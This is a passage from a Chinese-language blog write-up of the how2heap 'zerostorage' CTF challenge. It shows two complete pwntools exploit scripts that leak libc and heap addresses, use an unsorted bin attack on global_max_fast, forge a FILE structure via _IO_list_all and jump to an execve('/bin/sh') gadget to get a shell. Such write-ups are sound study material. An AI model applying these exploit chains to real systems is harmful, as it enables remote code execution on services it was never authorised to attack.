class="number">0x80</span>)<span class="comment">#2</span></span><br><span class="line">insert(<span class="number">0x74</span>,<span class="string">'d'</span>*<span class="number">0x74</span>)<span class="comment">#3 这里的chunk是为了merge自己之后能有一个0xfx的size，便于后面利用</span></span><br><span class="line">insert(<span class="number">0x80</span>,<span class="string">'e'</span>*<span class="number">0x80</span>)<span class="comment">#4</span></span><br><span class="line">insert(<span class="number">0x80</span>,<span class="string">'f'</span>*<span class="number">0x80</span>)<span class="comment">#5</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">4</span>)<span class="comment">#这里如果不先delete4的话会因为realloc中free了这块空间从而被double free</span></span><br><span class="line">merge(<span class="number">3</span>,<span class="number">3</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">merge(<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">view(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">':\n'</span>)</span><br><span class="line">heap_base=my_u64(p.recv(<span class="number">8</span>))<span class="number">-0x1b0</span></span><br><span class="line">libc_base=my_u64(p.recv(<span class="number">8</span>))<span class="number">-0x3c4b78</span></span><br><span class="line">loginfo(<span class="string">'heap_base'</span>,heap_base)</span><br><span class="line"></span><br><span class="line">fakechunk_offset=<span class="number">0x3c553b</span></span><br><span class="line">pad_len=<span class="number">0xcd</span><span class="comment">#到vtable指针的距离</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x110</span>,p64(<span class="number">0</span>)+p64(libc_base+g_m_f<span class="number">-0x10</span>)+<span class="string">'a'</span>*<span class="number">0x100</span>)</span><br><span class="line">insert(<span class="number">0xe0</span>,<span class="string">'+'</span>*<span class="number">0xe0</span>)</span><br><span class="line">insert(<span class="number">0x110</span>,<span class="string">'*'</span>*<span class="number">0x110</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">update(<span class="number">4</span>,<span class="number">0xe8</span>,p64(libc_base+fakechunk_offset)+<span class="string">'0'</span>*<span class="number">0xe0</span>)</span><br><span class="line">insert(<span class="number">0xe0</span>,p64(<span class="number">0</span>)*<span class="number">3</span>+p64(libc_base+<span class="number">0x4526a</span>)+<span class="string">'.'</span>*<span class="number">0xc0</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#这里要计算各种偏移，而且是对fakechunk来说的，所以显得有些繁琐?..没事，getshell天下第一</span></span><br><span class="line">payload=<span class="string">'.'</span>*<span class="number">0x15</span>+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)			<span class="comment">#满足 _IO_write_ptr(0x28偏移) &gt; _IO_write_base(0x20偏移)</span></span><br><span class="line">payload=payload.ljust(pad_len,<span class="string">'\x00'</span>)	<span class="comment">#满足0xc0偏移的_mode要&lt;=0</span></span><br><span class="line">insert(<span class="number">0xe0</span>,(payload+p64(heap_base+<span class="number">0x1c0</span>)).ljust(<span class="number">0xe0</span>,<span class="string">'\xee'</span>))</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'7'</span>)<span class="comment">#trigger</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="Exploit2"><a href="#Exploit2" class="headerlink" title="Exploit2"></a>Exploit2</h2><p>修改<code>global_max_fast</code>之后我本来是只想到了利用fastbin attack，但是发现好像有一个更牛逼的操作：</p>
<p>因为fastbin的限制现在变的特别大了，所以如果我们的chunk足够大的时候可以直接将chunk的地址填到别的地方去而不是fastbin的那个数组…这应该也算是数组越界的一个应用了，太顶了<br>如下（这是main_arena之后的可写数据段，一下就看到了一些熟悉的东西，而且指不定还有什么可以改，只要咱们的chunk够大2333）：</p>
<img src="/2020/02/26/how2heap-unsorted-bin-zerostorage/1582727103137.png" width="70%" height="70%">

<p>师傅们的操作是改了<code>_IO_list_all</code>，然后在对应chunk上伪造一个FILE，这里说一下写EXP自己踩的几个坑</p>
<ol>
<li>leak的时候unsortedbin上是有两个chunk的，所以干脆把链尾的那个chunk弄成0x400后面merge的时候可以直接取下来，省去了再insert的步骤，然后把fake_err和fake table都update到0x1000的那个chunk里面去</li>
<li>前面0x1000的chunk和0x400的chunk直接挨着就好</li>
<li><code>_IO_list_all</code>指向的是chunk header，但是我们写的时候是从data段开始写的，所以要注意这里少0x10个偏移，前面0x10的数据也用不了</li>
</ol>
<h3 id="完整EXP-1"><a href="#完整EXP-1" class="headerlink" title="完整EXP"></a>完整EXP</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./zerostorage'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">my_u32 = <span class="keyword">lambda</span> x: u32(x.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">g_m_f=<span class="number">0x3c67f8</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">loginfo</span><span class="params">(what=<span class="string">''</span>,address=<span class="number">0</span>)</span>:</span></span><br><span class="line">	log.info(<span class="string">"\033[1;36m"</span> + what + <span class="string">'-----&gt;'</span> + hex(address) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line"><span class="string">'''libc 2.23 x64</span></span><br><span class="line"><span class="string">0x45216 execve("/bin/sh", rsp+0x30, environ)constraints:  rax == NULL</span></span><br><span class="line"><span class="string">0x4526a execve("/bin/sh", rsp+0x30, environ)constraints:  [rsp+0x30] == NULL</span></span><br><span class="line"><span class="string">0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints:  [rsp+0x50] == NULL</span></span><br><span class="line"><span class="string">0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints:  [rsp+0x70] == NULL</span></span><br><span class="line"><span class="string">req = dest - old_top - 4*sizeof(long)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="comment">#todo here</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">insert</span><span class="params">(size,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Length of new entry: '</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.recvuntil(<span class="string">'Enter your data: '</span>)</span><br><span class="line">	p.send(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">update</span><span class="params">(id,size,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line">	p.recvuntil(<span class="string">"Length of entry: "</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.recvuntil(<span class="string">'Enter your data: '</span>)</span><br><span class="line">	p.send(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">merge</span><span class="params">(fromid,toid)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'from Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(fromid))</span><br><span class="line">	p.recvuntil(<span class="string">'to Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(toid))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(id)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">view</span><span class="params">(id)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line">	p.sendline(<span class="string">'5'</span>)</span><br><span class="line">	p.recvuntil(<span class="string">'Entry ID: '</span>)</span><br><span class="line">	p.sendline(str(id))</span><br><span class="line">insert(<span class="number">0x80</span>,<span class="string">'a'</span>*<span class="number">0x80</span>)<span class="comment">#0</span></span><br><span class="line">insert(<span class="number">0x80</span>,<span class="string">'b'</span>*<span class="number">0x80</span>)<span class="comment">#1</span></span><br><span class="line">insert(<span class="number">0x1000</span>,<span class="string">'d'</span>*<span class="number">0x1000</span>)<span class="comment">#2</span></span><br><span class="line">insert(<span class="number">0x3f0</span>,<span class="string">'e'</span>*<span class="number">0x3f0</span>)<span class="comment">#3</span></span><br><span class="line">insert(<span class="number">0x3f0</span>,<span class="string">'f'</span>*<span class="number">0x3f0</span>)<span class="comment">#4</span></span><br><span class="line">insert(<span class="number">0x80</span>,<span class="string">'g'</span>*<span class="number">0x80</span>)<span class="comment">#5</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">3</span>)<span class="comment">#delete for leak&amp;merge</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">1</span>)<span class="comment">#delete for merge</span></span><br><span class="line">merge(<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line">view(<span class="number">1</span>)<span class="comment">#leak</span></span><br><span class="line"></span><br><span class="line">heap_off=<span class="number">-0x1130</span></span><br><span class="line">libc_off=<span class="number">-0x3c4b78</span></span><br><span class="line">p.recvuntil(<span class="string">':\n'</span>)</span><br><span class="line">heap_base=heap_off+u64(p.recv(<span class="number">8</span>))</span><br><span class="line">libc_base=libc_off+u64(p.recv(<span class="number">8</span>))</span><br><span class="line">loginfo(<span class="string">"heapbase"</span>,heap_base)</span><br><span class="line">loginfo(<span class="string">"libcbase"</span>,libc_base)</span><br><span class="line"></span><br><span class="line">fake_err=<span class="string">''</span>.ljust(<span class="number">0x10</span>,<span class="string">'\x00'</span>)+p64(<span class="number">0</span>)+p64(<span class="number">16</span>)+p64(<span class="number">0</span>)*<span class="number">7</span><span class="comment">#offset-0x10 because '_IO_list_all' will point to the chunk header</span></span><br><span class="line">fake_err+=p64(libc_base+<span class="number">0x3c5620</span>)+p64(<span class="number">2</span>)+p64(<span class="number">0xffffffffffffffff</span>)+p64(<span class="number">0</span>)+p64(libc_base+<span class="number">0x3c6770</span>)</span><br><span class="line">fake_err=fake_err.ljust(<span class="number">0xc0</span>,<span class="string">'\x00'</span>)+p64(<span class="number">0</span>)</span><br><span class="line">fake_err=fake_err.ljust(<span class="number">0xc8</span>,<span class="string">'\x00'</span>)+p64(heap_base+<span class="number">0x200</span>)</span><br><span class="line"></span><br><span class="line">fake_table=p64(<span class="number">0</span>)*<span class="number">3</span>+p64(libc_base+<span class="number">0x4526a</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">update(<span class="number">2</span>,<span class="number">0x1000</span>,(fake_err+fake_table).ljust(<span class="number">0x1000</span>,<span class="string">'\x00'</span>))<span class="comment">#update to fake err FILE</span></span><br><span class="line"></span><br><span class="line">merge(<span class="number">4</span>,<span class="number">2</span>)<span class="comment">#merge to 0x1410 and unsortedbin have only one chunk now because of the UNLINK</span></span><br><span class="line"></span><br><span class="line">update(<span class="number">1</span>,<span class="number">0x100</span>,p64(<span class="number">0</span>)+p64(libc_base+g_m_f<span class="number">-0x10</span>)+<span class="string">'2'</span>*<span class="number">0xf0</span>)<span class="comment">#update for next insert to change global_max_fast</span></span><br><span class="line"></span><br><span class="line">insert(<span class="number">0x110</span>,<span class="string">'\x33'</span>*<span class="number">0x110</span>)<span class="comment">#change global_max_fast</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)<span class="comment">#delete 0x1410chunk</span></span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'7'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/how2heap/" rel="tag"># how2heap</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/02/25/FSOP-the-end/" rel="prev" title="FSOP&the_end">
      <i class="fa fa-chevron-left"></i> FSOP&the_end
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/02/29/how2heap-large-bin-attack-heapstorm2/" rel="next" title="how2heap - large_bin_attack&heapstorm2">
      how2heap - large_bin_attack&heapstorm2 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#how2heap-unsorted-bin-amp-zerostorage"><span class="nav-number">1.</span> <span class="nav-text">how2heap - unsorted_bin&amp;zerostorage</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unsorted-bin-into-stack-c"><span class="nav-number">2.</span> <span class="nav-text">unsorted_bin_into_stack.c</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unsorted-bin-attack-c"><span class="nav-number">3.</span> <span class="nav-text">unsorted_bin_attack.c</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#zerostorage"><span class="nav-number">4.</span> <span class="nav-text">zerostorage</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#程序分析（流程）"><span class="nav-number">4.1.</span> <span class="nav-text">程序分析（流程）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Insert"><span class="nav-number">4.1.1.</span> <span class="nav-text">Insert</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#update"><span class="nav-number">4.1.2.</span> <span class="nav-text">update</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#merge"><span class="nav-number">4.1.3.</span> <span class="nav-text">merge</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#delete"><span class="nav-number">4.1.4.</span> <span class="nav-text">delete</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#view"><span class="nav-number">4.1.5.</span> <span class="nav-text">view</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#list"><span class="nav-number">4.1.6.</span> <span class="nav-text">list</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞分析"><span class="nav-number">4.2.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit1"><span class="nav-number">4.3.</span> <span class="nav-text">Exploit1</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#完整EXP"><span class="nav-number">4.3.1.</span> <span class="nav-text">完整EXP</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit2"><span class="nav-number">4.4.</span> <span class="nav-text">Exploit2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#完整EXP-1"><span class="nav-number">4.4.1.</span> <span class="nav-text">完整EXP</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.7.0
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
